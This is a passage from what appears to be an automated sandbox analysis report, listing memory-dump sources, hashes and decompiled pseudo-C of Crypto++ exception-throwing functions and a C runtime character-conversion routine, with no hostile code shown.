                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: H_prolog3$H_prolog3_
                    • String ID: DecodingLookupArray$Log2Base
                    • API String ID: 4240126716-3088352070
                    • Opcode ID: e1b20197af55d6a27647b83ce36908807fc2f5235be414cfc748ef31822343de
                    • Instruction ID: b0f9ff07ab1a2f73618215ae87324647b5e5507c8a79aef78273254112d703af
                    • Opcode Fuzzy Hash: e1b20197af55d6a27647b83ce36908807fc2f5235be414cfc748ef31822343de
                    • Instruction Fuzzy Hash: B7112BB190020AABCB00EFAEC5809EEFBF8BF68314B54416EE10897650D7709A24CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E013C4A60(intOrPtr* __ecx) {
                    				void* _t20;
                    				intOrPtr _t22;
                    				intOrPtr* _t31;
                    				intOrPtr* _t33;
                    				intOrPtr* _t37;
                    				void* _t38;
                    
                    				_t31 = __ecx;
                    				_push(0x40);
                    				E013F26C2(E01415A99);
                    				_t37 = _t31;
                    				if( *((char*)(_t38 + 0xc)) != 0 &&  *((intOrPtr*)( *_t37 + 0xbc))() == 0) {
                    					E013C2AD0(_t38 - 0x24, "Unflushable<T>: this object has buffered input that cannot be flushed");
                    					 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                    					_push(_t38 - 0x24);
                    					_push(2);
                    					E013C2E51(_t38 - 0x4c);
                    					 *((intOrPtr*)(_t38 - 0x4c)) = 0x141a994;
                    					E013F4EC6(_t38 - 0x4c, 0x1430bd4);
                    				}
                    				_t33 =  *((intOrPtr*)( *_t37 + 0xa4))();
                    				if(_t33 == 0) {
                    					L6:
                    					_t20 = 0;
                    				} else {
                    					_t22 =  *((intOrPtr*)(_t38 + 0x10));
                    					if(_t22 == 0) {
                    						goto L6;
                    					} else {
                    						_t20 =  *((intOrPtr*)( *_t33 + 0x90))( *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t22 - 1,  *((intOrPtr*)(_t38 + 0x14)));
                    					}
                    				}
                    				return E013F269C(_t20);
                    			}









                    0x013c4a60
                    0x013c4a60
                    0x013c4a67
                    0x013c4a6c
                    0x013c4a72
                    0x013c4a88
                    0x013c4a8d
                    0x013c4a94
                    0x013c4a95
                    0x013c4a9a
                    0x013c4aa7
                    0x013c4aaf
                    0x013c4aaf
                    0x013c4abe
                    0x013c4ac2
                    0x013c4ae0
                    0x013c4ae0
                    0x013c4ac4
                    0x013c4ac4
                    0x013c4ac9
                    0x00000000
                    0x013c4acb
                    0x013c4ad8
                    0x013c4ad8
                    0x013c4ac9
                    0x013c4ae7

                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C4A67
                      • Part of subcall function 013C2E51: __EH_prolog3.LIBCMT ref: 013C2E58
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013C4AAF
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    • Unflushable<T>: this object has buffered input that cannot be flushed, xrefs: 013C4A80
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: H_prolog3$ExceptionException@8RaiseThrow
                    • String ID: Unflushable<T>: this object has buffered input that cannot be flushed
                    • API String ID: 1412866469-3781273281
                    • Opcode ID: cf5689888a971e31ff9914906a3d6812790a7779f56ec3097a6c6efc99f789b0
                    • Instruction ID: 6a8dafbc9a2ee6ea49bd69638e8dc9d0c7ab04ec4f00a4358f6287ad9174f9fb
                    • Opcode Fuzzy Hash: cf5689888a971e31ff9914906a3d6812790a7779f56ec3097a6c6efc99f789b0
                    • Instruction Fuzzy Hash: C9019238A00209EFEF15DF69C414BEE77B4AF14708F10446CAA15AB251CB71DD05CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			E013C3219(void* __ebx, intOrPtr* __ecx, void* __edx, void* __eflags) {
                    				void* _t14;
                    				void* _t16;
                    				intOrPtr* _t26;
                    				void* _t32;
                    				intOrPtr* _t34;
                    				void* _t35;
                    
                    				_t32 = __edx;
                    				_t26 = __ecx;
                    				_push(0x4c);
                    				E013F26C2(E01415BF7);
                    				_t34 = _t26;
                    				 *((intOrPtr*)(_t35 - 0x10)) = _t34;
                    				_t14 = E013C2AD0(_t35 - 0x58, "AlgorithmParametersBase: parameter \"");
                    				 *((intOrPtr*)(_t35 - 4)) = 0;
                    				_t16 = E013C1DF7(__ebx, _t35 - 0x58, _t32, _t35 - 0x40, _t14,  *((intOrPtr*)(_t35 + 8)));
                    				 *((char*)(_t35 - 4)) = 1;
                    				_push(E013C1DF7(__ebx, _t35 - 0x58, _t32, _t35 - 0x28, _t16, "\" not used"));
                    				_push(6);
                    				 *((char*)(_t35 - 4)) = 2;
                    				E013C2E51(_t34);
                    				E013C6118(_t35 - 0x28, 1, 0);
                    				E013C6118(_t35 - 0x40, 1, 0);
                    				E013C6118(_t35 - 0x58, 1, 0);
                    				 *_t34 = 0x141ab2c;
                    				return E013F269C(_t34);
                    			}









                    0x013c3219
                    0x013c3219
                    0x013c3219
                    0x013c3220
                    0x013c3225
                    0x013c3227
                    0x013c3232
                    0x013c3240
                    0x013c3244
                    0x013c3252
                    0x013c325f
                    0x013c3260
                    0x013c3264
                    0x013c3268
                    0x013c3273
                    0x013c327e
                    0x013c3289
                    0x013c328e
                    0x013c329b

                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C3220
                      • Part of subcall function 013C2E51: __EH_prolog3.LIBCMT ref: 013C2E58
                    Strings
                    • " not used, xrefs: 013C3249
                    • AlgorithmParametersBase: parameter ", xrefs: 013C322A
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: H_prolog3
                    • String ID: " not used$AlgorithmParametersBase: parameter "
                    • API String ID: 431132790-612349224
                    • Opcode ID: b8f3767bffd7df7b5960d0c2523b2fb5eb7719a419b5bb6c1380774833ca8be3
                    • Instruction ID: a565c053cc217a3d38cdcb7ea5e9041dc89ed4886c9a0847fedbdf3fff3f9f09
                    • Opcode Fuzzy Hash: b8f3767bffd7df7b5960d0c2523b2fb5eb7719a419b5bb6c1380774833ca8be3
                    • Instruction Fuzzy Hash: 5C0144B0940285AADB10F7A9CC15EDF7A78EFA5B14F50405EE501BB291DEB14E40C7A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E013C5328() {
                    				signed int _v4;
                    				char _v36;
                    				char _v60;
                    				char _v100;
                    				intOrPtr* _t15;
                    				void* _t16;
                    				void* _t23;
                    				intOrPtr* _t24;
                    				char* _t27;
                    
                    				E013F26C2(E01415B5E);
                    				_t15 =  *((intOrPtr*)( *_t24 + 0x34))(0x58);
                    				_t16 =  *((intOrPtr*)( *_t15 + 8))( &_v36);
                    				_v4 = _v4 & 0x00000000;
                    				_push(E013C1DF7(_t23, _t15,  *_t15,  &_v60, _t16, ": this object doesn\'t support resynchronization"));
                    				_push(0);
                    				_t27 =  &_v100;
                    				_v4 = 1;
                    				E013C2E51(_t27);
                    				_v100 = 0x141a7e4;
                    				E013F4EC6( &_v100, 0x142fa1c);
                    				asm("int3");
                    				goto ( *((intOrPtr*)( *((intOrPtr*)(_t27 + 0xfffffff8)) + 0xc)));
                    			}












                    0x013c532f
                    0x013c5336
                    0x013c5341
                    0x013c5344
                    0x013c535a
                    0x013c535b
                    0x013c535d
                    0x013c5360
                    0x013c5364
                    0x013c5371
                    0x013c5379
                    0x013c537e
                    0x013c5388

                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C532F
                      • Part of subcall function 013C2E51: __EH_prolog3.LIBCMT ref: 013C2E58
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013C5379
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    • : this object doesn't support resynchronization, xrefs: 013C5348
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: H_prolog3$ExceptionException@8RaiseThrow
                    • String ID: : this object doesn't support resynchronization
                    • API String ID: 1412866469-2714550406
                    • Opcode ID: 3f2e4c0a710cc770440ba13a4c1cd53f00938c3332d6a88c4953ad7e44df6182
                    • Instruction ID: be3991424d6b30e9830ad01fbe230772099f5d5cdb2159fbddb7882de34085a0
                    • Opcode Fuzzy Hash: 3f2e4c0a710cc770440ba13a4c1cd53f00938c3332d6a88c4953ad7e44df6182
                    • Instruction Fuzzy Hash: 9EF06231650348EFCB04EBA8D948FDEB3F8AF15714F604199F519AB2A1DB719E04CB51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 55%
                    			E013C568E(intOrPtr* __ecx) {
                    				intOrPtr* _t20;
                    				void* _t23;
                    
                    				_t20 = __ecx;
                    				_push(0x40);
                    				E013F26C2(E01415A99);
                    				_push( *((intOrPtr*)(_t23 + 0xc)));
                    				_push( *((intOrPtr*)(_t23 + 8)));
                    				if( *((intOrPtr*)( *_t20 + 0xc))() == 0) {
                    					E013C2AD0(_t23 - 0x24, "CryptoMaterial: this object contains invalid values");
                    					 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
                    					_push(_t23 - 0x24);
                    					_push(4);
                    					E013C2E51(_t23 - 0x4c);
                    					 *((intOrPtr*)(_t23 - 0x4c)) = 0x141aaac;
                    					_t14 = E013F4EC6(_t23 - 0x4c, 0x1430afc);
                    				}
                    				return E013F269C(_t14);
                    			}





                    0x013c568e
                    0x013c568e
                    0x013c5695
                    0x013c569a
                    0x013c569f
                    0x013c56a7
                    0x013c56b1
                    0x013c56b6
                    0x013c56bd
                    0x013c56be
                    0x013c56c3
                    0x013c56d0
                    0x013c56d8
                    0x013c56d8
                    0x013c56e2

                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C5695
                      • Part of subcall function 013C2E51: __EH_prolog3.LIBCMT ref: 013C2E58
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013C56D8
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    • CryptoMaterial: this object contains invalid values, xrefs: 013C56A9
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: H_prolog3$ExceptionException@8RaiseThrow
                    • String ID: CryptoMaterial: this object contains invalid values
                    • API String ID: 1412866469-887990677
                    • Opcode ID: 69f90bea22c047154daf4eaa2aaaf175ac7a8020f0a226207c4822065d26e3d5
                    • Instruction ID: a96fe80ec4bcd151beffc40a1b063df778d3ac27e670e16ad3dc34d2fc3f8ac3
                    • Opcode Fuzzy Hash: 69f90bea22c047154daf4eaa2aaaf175ac7a8020f0a226207c4822065d26e3d5
                    • Instruction Fuzzy Hash: C3F01C75A40209AFDF00FFE9C944FDEB774AF24768F608059AA14B7161CBB19E09CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E013C542E(void* __ecx) {
                    				intOrPtr _t12;
                    				void* _t18;
                    				void* _t21;
                    
                    				_t18 = __ecx;
                    				_push(0x40);
                    				E013F26C2(E01415A99);
                    				_t12 =  *((intOrPtr*)(_t21 + 8));
                    				if(_t12 != 0 && _t12 !=  *((intOrPtr*)(_t18 + 0x14))) {
                    					E013C2AD0(_t21 - 0x24, "CipherModeBase: feedback size cannot be specified for this cipher mode");
                    					 *(_t21 - 4) =  *(_t21 - 4) & 0x00000000;
                    					_push(_t21 - 0x24);
                    					_push(1);
                    					E013C2E51(_t21 - 0x4c);
                    					 *((intOrPtr*)(_t21 - 0x4c)) = 0x141a97c;
                    					_t12 = E013F4EC6(_t21 - 0x4c, 0x1430adc);
                    				}
                    				return E013F269C(_t12);
                    			}






                    0x013c542e
                    0x013c542e
                    0x013c5435
                    0x013c543a
                    0x013c543f
                    0x013c544e
                    0x013c5453
                    0x013c545a
                    0x013c545b
                    0x013c5460
                    0x013c546d
                    0x013c5475
                    0x013c5475
                    0x013c547f

                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C5435
                      • Part of subcall function 013C2E51: __EH_prolog3.LIBCMT ref: 013C2E58
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013C5475
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    • CipherModeBase: feedback size cannot be specified for this cipher mode, xrefs: 013C5446
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: H_prolog3$ExceptionException@8RaiseThrow
                    • String ID: CipherModeBase: feedback size cannot be specified for this cipher mode
                    • API String ID: 1412866469-2561568580
                    • Opcode ID: 91fbd278caf3a1bbbfe21004a69bc17aba0eb769e20a454aa1309b9105d205f7
                    • Instruction ID: 776187738a5fa4d7a6b56ae72dfb28cbcbbfb4dcb3c3636df4f287f9e435b7a6
                    • Opcode Fuzzy Hash: 91fbd278caf3a1bbbfe21004a69bc17aba0eb769e20a454aa1309b9105d205f7
                    • Instruction Fuzzy Hash: C9F03075A4020AAEEB10FAA9C491BEEBB74EB24B19F60441D9600B6150CBB0ED05CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E013C4BD0(void* __eflags) {
                    				void* _t18;
                    				void* _t19;
                    
                    				_push(0x40);
                    				E013F26C2(E01415A99);
                    				E013C2AD0(_t19 - 0x24, "BufferedTransformation: this object is not attachable");
                    				 *(_t19 - 4) =  *(_t19 - 4) & 0x00000000;
                    				_push(_t19 - 0x24);
                    				_push(0);
                    				_t18 = _t19 - 0x4c;
                    				E013C2E51(_t18);
                    				 *((intOrPtr*)(_t19 - 0x4c)) = 0x141a7e4;
                    				E013F4EC6(_t19 - 0x4c, 0x142fa1c);
                    				asm("int3");
                    				return  *((intOrPtr*)(_t18 + 0x24));
                    			}





                    0x013c4bd0
                    0x013c4bd7
                    0x013c4be4
                    0x013c4be9
                    0x013c4bf0
                    0x013c4bf1
                    0x013c4bf3
                    0x013c4bf6
                    0x013c4c03
                    0x013c4c0b
                    0x013c4c10
                    0x013c4c14

                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C4BD7
                      • Part of subcall function 013C2E51: __EH_prolog3.LIBCMT ref: 013C2E58
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013C4C0B
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    • BufferedTransformation: this object is not attachable, xrefs: 013C4BDC
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: H_prolog3$ExceptionException@8RaiseThrow
                    • String ID: BufferedTransformation: this object is not attachable
                    • API String ID: 1412866469-3944187330
                    • Opcode ID: 6439b4e6f0cbb5876a20d5fd365849a4e8e562fd9d5d9d2cf40a2f5377d1c425
                    • Instruction ID: 21cd85d83ae2fbf31ce4f2f53015fc55a7f9476ec4b45a35d4203584b0c94620
                    • Opcode Fuzzy Hash: 6439b4e6f0cbb5876a20d5fd365849a4e8e562fd9d5d9d2cf40a2f5377d1c425
                    • Instruction Fuzzy Hash: E9E026B4E40209AECF00EBE4C950BEFB7789F20708F70404E9611B7150CBB18E05CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E013C1B45(void* __eflags) {
                    				intOrPtr* _t30;
                    				char* _t35;
                    				intOrPtr _t36;
                    				char* _t38;
                    				void* _t39;
                    
                    				_push(0x40);
                    				E013F26C2(E01415A99);
                    				E013C2AD0(_t39 - 0x24, "Clone() is not implemented yet.");
                    				 *(_t39 - 4) =  *(_t39 - 4) & 0x00000000;
                    				_push(_t39 - 0x24);
                    				_push(0);
                    				_t35 = _t39 - 0x4c;
                    				E013C2E51(_t35);
                    				 *((intOrPtr*)(_t39 - 0x4c)) = 0x141a7e4;
                    				E013F4EC6(_t39 - 0x4c, 0x142fa1c);
                    				asm("int3");
                    				_push(4);
                    				E013F26C2(E0141538B);
                    				_t38 = _t35;
                    				 *((intOrPtr*)(_t39 - 0x10)) = _t38;
                    				 *_t38 = 0;
                    				 *((intOrPtr*)(_t38 + 4)) = 0;
                    				 *((intOrPtr*)(_t38 + 8)) = 0;
                    				 *(_t38 + 0x10) =  *(_t38 + 0x10) | 0xffffffff;
                    				 *((intOrPtr*)(_t38 + 0x14)) = 0;
                    				 *((intOrPtr*)(_t38 + 0x18)) = 0;
                    				_t30 =  *((intOrPtr*)(_t39 + 8));
                    				 *(_t39 - 4) = 1;
                    				_t36 =  *((intOrPtr*)(_t30 + 0x10));
                    				if( *((intOrPtr*)(_t30 + 0x14)) >= 0x10) {
                    					_t30 =  *_t30;
                    				}
                    				E013C487B(_t38, _t30, _t36,  *((intOrPtr*)(_t39 + 0xc)));
                    				return E013F269C(_t38);
                    			}








                    0x013c1b45
                    0x013c1b4c
                    0x013c1b59
                    0x013c1b5e
                    0x013c1b65
                    0x013c1b66
                    0x013c1b68
                    0x013c1b6b
                    0x013c1b78
                    0x013c1b80
                    0x013c1b85
                    0x013c1b86
                    0x013c1b8d
                    0x013c1b92
                    0x013c1b94
                    0x013c1b99
                    0x013c1b9b
                    0x013c1b9e
                    0x013c1ba1
                    0x013c1ba5
                    0x013c1ba8
                    0x013c1bab
                    0x013c1bae
                    0x013c1bb9
                    0x013c1bbc
                    0x013c1bbe
                    0x013c1bbe
                    0x013c1bc7
                    0x013c1bd3

                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C1B4C
                      • Part of subcall function 013C2E51: __EH_prolog3.LIBCMT ref: 013C2E58
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013C1B80
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    • Clone() is not implemented yet., xrefs: 013C1B51
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: H_prolog3$ExceptionException@8RaiseThrow
                    • String ID: Clone() is not implemented yet.
                    • API String ID: 1412866469-226299721
                    • Opcode ID: fa44b39c80354ee4b2fd7975e9fc12f529d497e69311334bbf9db910ae038537
                    • Instruction ID: 14638d8fd42f9819f24825152f5c1231e48bc329d67d7f12f57e973303113bb9
                    • Opcode Fuzzy Hash: fa44b39c80354ee4b2fd7975e9fc12f529d497e69311334bbf9db910ae038537
                    • Instruction Fuzzy Hash: B1E08670D5020D9BDB04EBD4C841BDEB3789F20718F60401E9611B7150CBB19E04CB21
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E013FF33F(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
                    				char* _v8;
                    				int _v12;
                    				char _v16;
                    				char _v24;
                    				char _v28;
                    				void* __ebx;
                    				char _t34;
                    				int _t35;
                    				int _t38;
                    				long _t39;
                    				char* _t42;
                    				int _t44;
                    				int _t47;
                    				int _t53;
                    				intOrPtr _t55;
                    				void* _t56;
                    				char* _t57;
                    				char* _t62;
                    				char* _t63;
                    				void* _t64;
                    				int _t65;
                    				short* _t67;
                    				short* _t68;
                    				int _t69;
                    				intOrPtr* _t70;
                    
                    				_t64 = __edx;
                    				_t53 = _a12;
                    				_t67 = _a4;
                    				_t68 = 0;
                    				if(_t67 == 0) {
                    					L3:
                    					if(_a8 != _t68) {
                    						E013FEF21(_t53,  &_v28, _t64, _a16);
                    						_t34 = _v24;
                    						__eflags = _t67;
                    						if(_t67 == 0) {
                    							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
                    							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
                    								_t69 = _t68 | 0xffffffff;
                    								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
                    								__eflags = _t35;
                    								if(_t35 != 0) {
                    									L29:
                    									_t28 = _t35 - 1; // -1
                    									_t69 = _t28;
                    									L30:
                    									__eflags = _v16;
                    									if(_v16 != 0) {
                    										_t55 = _v28;
                    										_t31 = _t55 + 0x350;
                    										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
                    										__eflags =  *_t31;
                    									}
                    									return _t69;
                    								}
                    								 *((intOrPtr*)(E013FDB3A())) = 0x2a;
                    								goto L30;
                    							}
                    							_t70 = _a8;
                    							_t25 = _t70 + 1; // 0x1
                    							_t56 = _t25;
                    							do {
                    								_t38 =  *_t70;
                    								_t70 = _t70 + 1;
                    								__eflags = _t38;
                    							} while (_t38 != 0);
                    							_t69 = _t70 - _t56;
                    							goto L30;
                    						}
                    						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
                    						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
                    							_t69 = _t68 | 0xffffffff;
                    							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
                    							__eflags = _t35;
                    							if(_t35 != 0) {
                    								goto L29;
                    							}
                    							_t39 = GetLastError();
                    							__eflags = _t39 - 0x7a;
                    							if(_t39 != 0x7a) {
                    								L21:
                    								 *((intOrPtr*)(E013FDB3A())) = 0x2a;
                    								 *_t67 = 0;
                    								goto L30;
                    							}
                    							_t42 = _a8;
                    							_t57 = _t42;
                    							_v8 = _t57;
                    							_t65 = _t53;
                    							__eflags = _t53;
                    							if(_t53 == 0) {
                    								L20:
                    								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
                    								__eflags = _t44;
                    								if(_t44 != 0) {
                    									_t69 = _t44;
                    									goto L30;
                    								}
                    								goto L21;
                    							} else {
                    								goto L15;
                    							}
                    							while(1) {
                    								L15:
                    								_t45 =  *_t57;
                    								_v12 = _t65 - 1;
                    								__eflags =  *_t57;
                    								if(__eflags == 0) {
                    									break;
                    								}
                    								_t47 = E014094B1(__eflags, _t45 & 0x000000ff,  &_v24);
                    								_t62 = _v8;
                    								__eflags = _t47;
                    								if(_t47 == 0) {
                    									L18:
                    									_t65 = _v12;
                    									_t57 = _t62 + 1;
                    									_v8 = _t57;
                    									__eflags = _t65;
                    									if(_t65 != 0) {
                    										continue;
                    									}
                    									break;
                    								}
                    								_t62 = _t62 + 1;
                    								__eflags =  *_t62;
                    								if( *_t62 == 0) {
                    									goto L21;
                    								}
                    								goto L18;
                    							}
                    							_t42 = _a8;
                    							goto L20;
                    						}
                    						__eflags = _t53;
                    						if(_t53 == 0) {
                    							goto L30;
                    						}
                    						_t63 = _a8;
                    						while(1) {
                    							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
                    							__eflags =  *(_t68 + _t63);
                    							if( *(_t68 + _t63) == 0) {
                    								goto L30;
                    							}
                    							_t68 =  &(_t68[0]);
                    							_t67 =  &(_t67[1]);
                    							__eflags = _t68 - _t53;
                    							if(_t68 < _t53) {
                    								continue;
                    							}
                    							goto L30;
                    						}
                    						goto L30;
                    					}
                    					 *((intOrPtr*)(E013FDB3A())) = 0x16;
                    					return E013FDA61() | 0xffffffff;
                    				}
                    				if(_t53 != 0) {
                    					 *_t67 = 0;
                    					goto L3;
                    				}
                    				return 0;
                    			}




























                    0x013ff33f
                    0x013ff348
                    0x013ff34d
                    0x013ff350
                    0x013ff354
                    0x013ff363
                    0x013ff366
                    0x013ff386
                    0x013ff38b
                    0x013ff38e
                    0x013ff390
                    0x013ff45e
                    0x013ff464
                    0x013ff479
                    0x013ff485
                    0x013ff48b
                    0x013ff48d
                    0x013ff49c
                    0x013ff49c
                    0x013ff49c
                    0x013ff49f
                    0x013ff49f
                    0x013ff4a3
                    0x013ff4a5
                    0x013ff4a8
                    0x013ff4a8
                    0x013ff4a8
                    0x013ff4a8
                    0x00000000
                    0x013ff4af
                    0x013ff494
                    0x00000000
                    0x013ff494
                    0x013ff466
                    0x013ff469
                    0x013ff469
                    0x013ff46c
                    0x013ff46c
                    0x013ff46e
                    0x013ff46f
                    0x013ff46f
                    0x013ff473
                    0x00000000
